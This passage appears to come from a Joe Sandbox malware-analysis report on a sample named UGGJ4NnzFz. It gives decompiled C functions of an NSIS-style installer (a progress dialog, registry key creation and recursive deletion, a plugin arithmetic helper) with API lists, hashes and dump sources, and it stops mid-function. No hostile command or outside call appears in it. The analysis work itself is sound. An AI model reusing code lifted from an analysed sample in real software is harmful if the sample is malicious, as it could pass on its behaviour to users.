                                                                                                                  • Part of subcall function 00404F04: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FC0
                                                                                                                • CreateDialogParamA.USER32(0000006F,00000000,00402B3B,00000000), ref: 00402C5B
                                                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00402C69
                                                                                                                  • Part of subcall function 00402BB7: MulDiv.KERNEL32(00000000,00000064,?), ref: 00402BCC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                • String ID: ... %d%%
                                                                                                                • API String ID: 722711167-2449383134
                                                                                                                • Opcode ID: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
                                                                                                                • Instruction ID: c44cf6bb529b7c61e0c77009ed50883557557090b8ffabf6f859222ef57aaf40
                                                                                                                • Opcode Fuzzy Hash: f8ace1eb95c0e61b2c61dafef86db0eeb17deac8452a01d8f5baf0090805ef89
                                                                                                                • Instruction Fuzzy Hash: C6016170949210EBD7215F61EE4DA9F7B78AB04701B14403BF502B11E5C6BC9A01CBAE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004047D3, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004047D3(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                                                0x004047e1
                                                                                                                0x004047ee
                                                                                                                0x004047f4
                                                                                                                0x00404832
                                                                                                                0x00404832
                                                                                                                0x00404841
                                                                                                                0x00404848
                                                                                                                0x00000000
                                                                                                                0x0040484a
                                                                                                                0x004047f6
                                                                                                                0x00404805
                                                                                                                0x0040480d
                                                                                                                0x00404810
                                                                                                                0x00404822
                                                                                                                0x00404828
                                                                                                                0x0040482f
                                                                                                                0x00000000
                                                                                                                0x0040482f
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004047EE
                                                                                                                • GetMessagePos.USER32 ref: 004047F6
                                                                                                                • ScreenToClient.USER32 ref: 00404810
                                                                                                                • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404822
                                                                                                                • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404848
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                • String ID: f
                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                                • Instruction ID: 01d6173a61c3c3b4b037133c9a52f1e04ee3049876a8ff08b59bebc5d15cf036
                                                                                                                • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                                                                                                                • Instruction Fuzzy Hash: BA018075D40218BADB00DB94CC41BFEBBBCAB55711F10412ABB00B61C0C3B46501CB95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402B3B, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00402B3B(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BB7();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                                                0x00402b48
                                                                                                                0x00402b56
                                                                                                                0x00402b5c
                                                                                                                0x00402b5c
                                                                                                                0x00402b6a
                                                                                                                0x00402b6c
                                                                                                                0x00402b78
                                                                                                                0x00402b7d
                                                                                                                0x00402b7f
                                                                                                                0x00402b7f
                                                                                                                0x00402b8a
                                                                                                                0x00402b9a
                                                                                                                0x00402bac
                                                                                                                0x00402bac
                                                                                                                0x00402bb4

                                                                                                                APIs
                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
                                                                                                                • wsprintfA.USER32 ref: 00402B8A
                                                                                                                • SetWindowTextA.USER32(?,?), ref: 00402B9A
                                                                                                                • SetDlgItemTextA.USER32 ref: 00402BAC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                • API String ID: 1451636040-1158693248
                                                                                                                • Opcode ID: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
                                                                                                                • Instruction ID: 39266fd7d8b3d51d4259f470751267aa52f8e49dbca779dff7f29341b6a717b4
                                                                                                                • Opcode Fuzzy Hash: a19141f3df1e0a3c8b8c2abcbd515ef60a2dd56e778219f0b9cb34bd20a9fb2d
                                                                                                                • Instruction Fuzzy Hash: AFF03671900109ABEF255F51DD0ABEE3779FB00305F008036FA05B51D1D7F9AA559F99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402303, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E00402303(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402AEB(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029F6(2);
				_t18 = E004029F6(0x11);
				_t31 =  *0x423f50 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f50 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029F6(0x23);
						_t19 = lstrlenA(0x40a370) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029D9(3);
						 *0x40a370 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F18(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a370, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a370, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}










                                                                                                                0x00402304
                                                                                                                0x00402309
                                                                                                                0x00402313
                                                                                                                0x0040231d
                                                                                                                0x00402320
                                                                                                                0x00402330
                                                                                                                0x0040233a
                                                                                                                0x00402341
                                                                                                                0x00402349
                                                                                                                0x00402357
                                                                                                                0x0040235b
                                                                                                                0x00402366
                                                                                                                0x00402366
                                                                                                                0x0040236a
                                                                                                                0x0040236e
                                                                                                                0x00402374
                                                                                                                0x00402379
                                                                                                                0x00402379
                                                                                                                0x0040237d
                                                                                                                0x00402389
                                                                                                                0x00402389
                                                                                                                0x004023a2
                                                                                                                0x004023a4
                                                                                                                0x004023a4
                                                                                                                0x004023a7
                                                                                                                0x0040247d
                                                                                                                0x0040247d
                                                                                                                0x0040288e
                                                                                                                0x0040289a

                                                                                                                APIs
                                                                                                                • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402341
                                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402361
                                                                                                                • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040239A
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040247D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateValuelstrlen
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsyA3E4.tmp
                                                                                                                • API String ID: 1356686001-3896262095
                                                                                                                • Opcode ID: 7863a0f49a6f39dd7089a52df85a66d0e401da730b8a2c07c6ee90d0110cbeae
                                                                                                                • Instruction ID: d7b132d9018d44432a73f3315d2b91b6aa1600c7a927e9fa70905f900517fa5a
                                                                                                                • Opcode Fuzzy Hash: 7863a0f49a6f39dd7089a52df85a66d0e401da730b8a2c07c6ee90d0110cbeae
                                                                                                                • Instruction Fuzzy Hash: BA1160B1E00209BFEB10AFA0DE49EAF767CFB54398F10413AF905B61D0D7B85D019669
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 73751837, Relevance: 7.7, APIs: 5, Instructions: 194COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E73751837(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				void* _v8;
				signed int _v12;
				signed int _v20;
				signed int _v24;
				char _v52;
				void _t45;
				void _t46;
				signed int _t47;
				signed int _t48;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t60;
				signed int _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				signed int _t77;
				void* _t81;
				signed int _t83;
				signed int _t85;
				signed int _t87;
				signed int _t90;
				void* _t101;

				_t85 = __edx;
				 *0x7375405c = _a8;
				_t77 = 0;
				 *0x73754060 = _a16;
				_v12 = 0;
				_v8 = E7375123B();
				_t90 = E737512FE(_t42);
				_t87 = _t85;
				_t81 = E7375123B();
				_a8 = _t81;
				_t45 =  *_t81;
				if(_t45 != 0x7e && _t45 != 0x21) {
					_a16 = E7375123B();
					_t77 = E737512FE(_t74);
					_v12 = _t85;
					GlobalFree(_a16);
					_t81 = _a8;
				}
				_t46 =  *_t81;
				_t101 = _t46 - 0x2f;
				if(_t101 > 0) {
					_t47 = _t46 - 0x3c;
					__eflags = _t47;
					if(_t47 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3c;
						if( *((char*)(_t81 + 1)) != 0x3c) {
							__eflags = _t87 - _v12;
							if(__eflags > 0) {
								L56:
								_t48 = 0;
								__eflags = 0;
								L57:
								asm("cdq");
								L58:
								_t90 = _t48;
								_t87 = _t85;
								L59:
								E73751429(_t85, _t90, _t87,  &_v52);
								E73751266( &_v52);
								GlobalFree(_v8);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L49:
								__eflags = 0;
								L50:
								_t48 = 1;
								goto L57;
							}
							__eflags = _t90 - _t77;
							if(_t90 < _t77) {
								goto L49;
							}
							goto L56;
						}
						_t85 = _t87;
						_t48 = E73752EF0(_t90, _t77, _t85);
						goto L58;
					}
					_t57 = _t47 - 1;
					__eflags = _t57;
					if(_t57 == 0) {
						__eflags = _t90 - _t77;
						if(_t90 != _t77) {
							goto L56;
						}
						__eflags = _t87 - _v12;
						if(_t87 != _v12) {
							goto L56;
						}
						goto L49;
					}
					_t58 = _t57 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x3e;
						if( *((char*)(_t81 + 1)) != 0x3e) {
							__eflags = _t87 - _v12;
							if(__eflags < 0) {
								goto L56;
							}
							if(__eflags > 0) {
								goto L49;
							}
							__eflags = _t90 - _t77;
							if(_t90 <= _t77) {
								goto L56;
							}
							goto L49;
						}
						__eflags =  *((char*)(_t81 + 2)) - 0x3e;
						_t85 = _t87;
						_t59 = _t90;
						_t83 = _t77;
						if( *((char*)(_t81 + 2)) != 0x3e) {
							_t48 = E73752F10(_t59, _t83, _t85);
						} else {
							_t48 = E73752F40(_t59, _t83, _t85);
						}
						goto L58;
					}
					_t60 = _t58 - 0x20;
					__eflags = _t60;
					if(_t60 == 0) {
						_t90 = _t90 ^ _t77;
						_t87 = _t87 ^ _v12;
						goto L59;
					}
					_t61 = _t60 - 0x1e;
					__eflags = _t61;
					if(_t61 == 0) {
						__eflags =  *((char*)(_t81 + 1)) - 0x7c;
						if( *((char*)(_t81 + 1)) != 0x7c) {
							_t90 = _t90 | _t77;
							_t87 = _t87 | _v12;
							goto L59;
						}
						__eflags = _t90 | _t87;
						if((_t90 | _t87) != 0) {
							goto L49;
						}
						__eflags = _t77 | _v12;
						if((_t77 | _v12) != 0) {
							goto L49;
						}
						goto L56;
					}
					__eflags = _t61 == 0;
					if(_t61 == 0) {
						_t90 =  !_t90;
						_t87 =  !_t87;
					}
					goto L59;
				}
				if(_t101 == 0) {
					L21:
					__eflags = _t77 | _v12;
					if((_t77 | _v12) != 0) {
						_v24 = E73752D80(_t90, _t87, _t77, _v12);
						_v20 = _t85;
						_t48 = E73752E30(_t90, _t87, _t77, _v12);
						_t81 = _a8;
					} else {
						_v24 = _v24 & 0x00000000;
						_v20 = _v20 & 0x00000000;
						_t48 = _t90;
						_t85 = _t87;
					}
					__eflags =  *_t81 - 0x2f;
					if( *_t81 != 0x2f) {
						goto L58;
					} else {
						_t90 = _v24;
						_t87 = _v20;
						goto L59;
					}
				}
				_t67 = _t46 - 0x21;
				if(_t67 == 0) {
					_t48 = 0;
					__eflags = _t90 | _t87;
					if((_t90 | _t87) != 0) {
						goto L57;
					}
					goto L50;
				}
				_t68 = _t67 - 4;
				if(_t68 == 0) {
					goto L21;
				}
				_t69 = _t68 - 1;
				if(_t69 == 0) {
					__eflags =  *((char*)(_t81 + 1)) - 0x26;
					if( *((char*)(_t81 + 1)) != 0x26) {
						_t90 = _t90 & _t77;
						_t87 = _t87 & _v12;
						goto L59;
					}
					__eflags = _t90 | _t87;
					if((_t90 | _t87) == 0) {
						goto L56;
					}
					__eflags = _t77 | _v12;
					if((_t77 | _v12) == 0) {
						goto L56;
					}
					goto L49;
				}
				_t70 = _t69 - 4;
				if(_t70 == 0) {
					_t48 = E73752D40(_t90, _t87, _t77, _v12);
					goto L58;
				} else {
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						_t90 = _t90 + _t77;
						asm("adc edi, [ebp-0x8]");
					} else {
						if(_t71 == 0) {
							_t90 = _t90 - _t77;
							asm("sbb edi, [ebp-0x8]");
						}
					}
					goto L59;
				}
			}





























                                                                                                                0x73751837
                                                                                                                0x73751841
                                                                                                                0x7375184a
                                                                                                                0x7375184d
                                                                                                                0x73751852
                                                                                                                0x7375185b
                                                                                                                0x73751864
                                                                                                                0x73751866
                                                                                                                0x7375186d
                                                                                                                0x7375186f
                                                                                                                0x73751872
                                                                                                                0x73751876
                                                                                                                0x73751882
                                                                                                                0x7375188b
                                                                                                                0x73751890
                                                                                                                0x73751893
                                                                                                                0x73751899
                                                                                                                0x73751899
                                                                                                                0x7375189c
                                                                                                                0x7375189f
                                                                                                                0x737518a2
                                                                                                                0x73751968
                                                                                                                0x73751968
                                                                                                                0x7375196b
                                                                                                                0x737519e5
                                                                                                                0x737519e9
                                                                                                                0x737519f8
                                                                                                                0x737519fb
                                                                                                                0x73751a03
                                                                                                                0x73751a03
                                                                                                                0x73751a03
                                                                                                                0x73751a05
                                                                                                                0x73751a05
                                                                                                                0x73751a06
                                                                                                                0x73751a06
                                                                                                                0x73751a08
                                                                                                                0x73751a0a
                                                                                                                0x73751a10
                                                                                                                0x73751a19
                                                                                                                0x73751a2a
                                                                                                                0x73751a35
                                                                                                                0x73751a35
                                                                                                                0x737519fd
                                                                                                                0x737519e0
                                                                                                                0x737519e0
                                                                                                                0x737519e2
                                                                                                                0x737519e2
                                                                                                                0x00000000
                                                                                                                0x737519e2
                                                                                                                0x737519ff
                                                                                                                0x73751a01
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751a01
                                                                                                                0x737519ed
                                                                                                                0x737519f1
                                                                                                                0x00000000
                                                                                                                0x737519f1
                                                                                                                0x7375196d
                                                                                                                0x7375196d
                                                                                                                0x7375196e
                                                                                                                0x737519d7
                                                                                                                0x737519d9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x737519db
                                                                                                                0x737519de
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x737519de
                                                                                                                0x73751970
                                                                                                                0x73751970
                                                                                                                0x73751971
                                                                                                                0x737519aa
                                                                                                                0x737519ae
                                                                                                                0x737519ca
                                                                                                                0x737519cd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x737519cf
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x737519d1
                                                                                                                0x737519d3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x737519d5
                                                                                                                0x737519b0
                                                                                                                0x737519b4
                                                                                                                0x737519b6
                                                                                                                0x737519b8
                                                                                                                0x737519ba
                                                                                                                0x737519c3
                                                                                                                0x737519bc
                                                                                                                0x737519bc
                                                                                                                0x737519bc
                                                                                                                0x00000000
                                                                                                                0x737519ba
                                                                                                                0x73751973
                                                                                                                0x73751973
                                                                                                                0x73751976
                                                                                                                0x737519a3
                                                                                                                0x737519a5
                                                                                                                0x00000000
                                                                                                                0x737519a5
                                                                                                                0x73751978
                                                                                                                0x73751978
                                                                                                                0x7375197b
                                                                                                                0x7375198b
                                                                                                                0x7375198f
                                                                                                                0x7375199c
                                                                                                                0x7375199e
                                                                                                                0x00000000
                                                                                                                0x7375199e
                                                                                                                0x73751991
                                                                                                                0x73751993
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751995
                                                                                                                0x73751998
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x7375199a
                                                                                                                0x7375197e
                                                                                                                0x7375197f
                                                                                                                0x73751985
                                                                                                                0x73751987
                                                                                                                0x73751987
                                                                                                                0x00000000
                                                                                                                0x7375197f
                                                                                                                0x737518a8
                                                                                                                0x73751920
                                                                                                                0x73751922
                                                                                                                0x73751925
                                                                                                                0x73751943
                                                                                                                0x73751946
                                                                                                                0x7375194c
                                                                                                                0x73751951
                                                                                                                0x73751927
                                                                                                                0x73751927
                                                                                                                0x7375192b
                                                                                                                0x7375192f
                                                                                                                0x73751931
                                                                                                                0x73751931
                                                                                                                0x73751954
                                                                                                                0x73751957
                                                                                                                0x00000000
                                                                                                                0x7375195d
                                                                                                                0x7375195d
                                                                                                                0x73751960
                                                                                                                0x00000000
                                                                                                                0x73751960
                                                                                                                0x73751957
                                                                                                                0x737518aa
                                                                                                                0x737518ad
                                                                                                                0x73751911
                                                                                                                0x73751913
                                                                                                                0x73751915
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x7375191b
                                                                                                                0x737518af
                                                                                                                0x737518b2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x737518b4
                                                                                                                0x737518b5
                                                                                                                0x737518eb
                                                                                                                0x737518ef
                                                                                                                0x73751907
                                                                                                                0x73751909
                                                                                                                0x00000000
                                                                                                                0x73751909
                                                                                                                0x737518f1
                                                                                                                0x737518f3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x737518f9
                                                                                                                0x737518fc
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x73751902
                                                                                                                0x737518b7
                                                                                                                0x737518ba
                                                                                                                0x737518e1
                                                                                                                0x00000000
                                                                                                                0x737518bc
                                                                                                                0x737518bc
                                                                                                                0x737518bd
                                                                                                                0x737518d1
                                                                                                                0x737518d3
                                                                                                                0x737518bf
                                                                                                                0x737518c1
                                                                                                                0x737518c7
                                                                                                                0x737518c9
                                                                                                                0x737518c9
                                                                                                                0x737518c1
                                                                                                                0x00000000
                                                                                                                0x737518bd

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.221701988.0000000073751000.00000020.00020000.sdmp, Offset: 73750000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.221693886.0000000073750000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.221717346.0000000073753000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.221724453.0000000073755000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_73750000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeGlobal
                                                                                                                • String ID:
                                                                                                                • API String ID: 2979337801-0
                                                                                                                • Opcode ID: 32085f8371d6b8eb8cc190ff1c7a19c618964ddbe9614849a6cd9e7097a4ad75
                                                                                                                • Instruction ID: ca98d1a6bc396f33aa5602606383cd2263f3938f4b2846119b9a0fba15eef47e
                                                                                                                • Opcode Fuzzy Hash: 32085f8371d6b8eb8cc190ff1c7a19c618964ddbe9614849a6cd9e7097a4ad75
                                                                                                                • Instruction Fuzzy Hash: 9D510732D041D8AFEF1F9FB4C9847AEBBBAAB44257F18415AF407E3184C73169419751
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402A36, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E00402A36(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A36(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405E88(2);
					if(_t27 == 0) {
						if( *0x423f50 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}








                                                                                                                0x00402a57
                                                                                                                0x00402a5f
                                                                                                                0x00402a87
                                                                                                                0x00402a71
                                                                                                                0x00402ac1
                                                                                                                0x00402ac7
                                                                                                                0x00000000
                                                                                                                0x00402ac9
                                                                                                                0x00402a85
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402a85
                                                                                                                0x00402a9c
                                                                                                                0x00402aa4
                                                                                                                0x00402aab
                                                                                                                0x00402ad7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402adf
                                                                                                                0x00402ae7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402ae7
                                                                                                                0x00000000
                                                                                                                0x00402aba
                                                                                                                0x00402ace

                                                                                                                APIs
                                                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A57
                                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402A9C
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402AC1
                                                                                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 1912718029-0
                                                                                                                • Opcode ID: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
                                                                                                                • Instruction ID: 3ec7b1818cbfc33efeafaf7017db19c7c479205e5d6f4ff66fb244667a93d6f3
                                                                                                                • Opcode Fuzzy Hash: 90165163457562f2d2db0d0e016cf4740f9c141c2854e05e69f214c53397e3bf
                                                                                                                • Instruction Fuzzy Hash: 93112971A00009FFDF319F90DE49EAF7B7DEB44385B104436F905A10A0DBB59E51AE69
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401CC1, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
